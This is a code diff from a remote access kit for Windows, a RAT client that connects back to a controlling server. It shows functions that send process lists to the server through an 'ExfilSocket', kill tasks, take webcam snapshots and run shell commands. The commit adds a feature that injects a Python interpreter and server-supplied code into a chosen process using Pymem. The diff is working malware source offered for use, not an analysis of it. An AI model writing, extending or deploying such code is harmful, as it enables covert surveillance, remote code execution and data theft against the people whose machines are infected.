10
10
# [A Remote Access Kit for Windows]
11
11
# Author: SlizBinksman
12
12
# Github: https://github.com/slizbinksman
13
- # Build: 1.0.21
13
+ # Build: 1.0.22
14
14
# -------------------------------------------------------------
15
15
16
16
import socket
22
22
import threading
23
23
import struct
24
24
import cv2
25
-
25
+ import psutil
26
26
from PIL import ImageGrab
27
27
from time import sleep
28
28
from cryptography .fernet import Fernet
29
+ from pymem import Pymem
29
30
30
31
SEP = '<sep>' #Create static seperator string
31
32
BUFFER = 4096 #Create static buffer int
@@ -57,12 +58,6 @@ def get_windows_version(self):
57
58
version_output = version_output .replace ('\n ' ,'' ) #Replace new line with empty string
58
59
return version_output .strip ('\r ' ) #Strip carriage return and return the output
59
60
60
- #Function will return the output of all running process's on the machine
61
- def get_running_process (self ):
62
- command = subprocess .Popen (['powershell' , 'get-process' ],stdout = subprocess .PIPE ,shell = True ) #Run the command
63
- com_output = command .stdout .read ().decode () #Capture, read and decode output
64
- return com_output #Return output
65
-
66
61
#Function will get computers local ip and return it as string
67
62
def get_local_ip (self ):
68
63
local_ip = socket .gethostbyname (socket .gethostname ()) #Resolve system name
@@ -116,8 +111,17 @@ def shutdown_computer(self):
116
111
117
112
#Function will send back a list of running process's to the server
118
113
def extract_process_list (self ):
119
- process_list = Utilitys ().get_running_process () #Get process's
120
- ExfilSocket ().exfil_socket_send (process_list ) #Send to server
114
+ process_string = '' # Define a local string to store information about the process's
115
+ for process in psutil .process_iter (): # For each process found in the running process's
116
+ process_name = process .name () # Get process name
117
+ pid = process .pid # Get pid of process
118
+ try :
119
+ username = process .username () # Get username
120
+ except psutil .AccessDenied :
121
+ username = 'NT AUTHORITY\SYSTEM' # If we are running in userland, admin process's will raise an error on call to username. manually set uname.
122
+ string = f'{ process_name } { SEP } { str (pid )} { SEP } { username } { SEP } \n ' #Create string
123
+ process_string += string # Append string to local master string
124
+ ExfilSocket ().exfil_socket_send (process_string ) #Send local master string to server
121
125
122
126
#Function will kill a task by the pid passed as parameter and send the output to the server
123
127
def kill_task (self ,pid ):
@@ -162,6 +166,7 @@ def __init__(self):
162
166
self .process_manager = 'proc_list'
163
167
self .term_process = 'terminate'
164
168
self .snapshot = 'snap_shot'
169
+ self .inject_python = 'inject_pie'
165
170
166
171
#Function will connect to server to initiate handshake
167
172
def connect_to_server (self ):
@@ -259,6 +264,8 @@ def main(self):
259
264
SystemManager ().kill_task (server_command [1 ]) #kill the task by pid received from server
260
265
if action_flag == self .snapshot : #if the action is to send a snapshot from the webcam
261
266
StreamSocket ().webcam_snapshot () #Send a webcam snapshot
267
+ if action_flag == self .inject_python : #If the action is to inject some python code,
268
+ CodeExecution ().inject_and_exec (server_command [1 ],server_command [2 ]) #Inject python code
262
269
263
270
#Function will retrieve all data sent by server socket
264
271
def recv_all_data (self ):
@@ -379,4 +386,11 @@ def exec_(system_command): #Create local exec function
379
386
pass
380
387
MultiProcessor ().start_child_thread_arg (exec_ ,system_command ) #Start new thread for shell commands. Main thread will continue to communicate with server
381
388
389
+ #Function will inject a python interpreter into a process and then load
390
+ #Python code to be executed by it.
391
+ def inject_and_exec (self ,process_name ,python_code ):
392
+ process = Pymem (process_name ) #Hooke the process
393
+ process .inject_python_interpreter () #Inject the python dll
394
+ process .inject_python_shellcode (python_code ) #Inject the python code into the code
395
+
382
396
ClientSocket ().connect_to_server ()
0 commit comments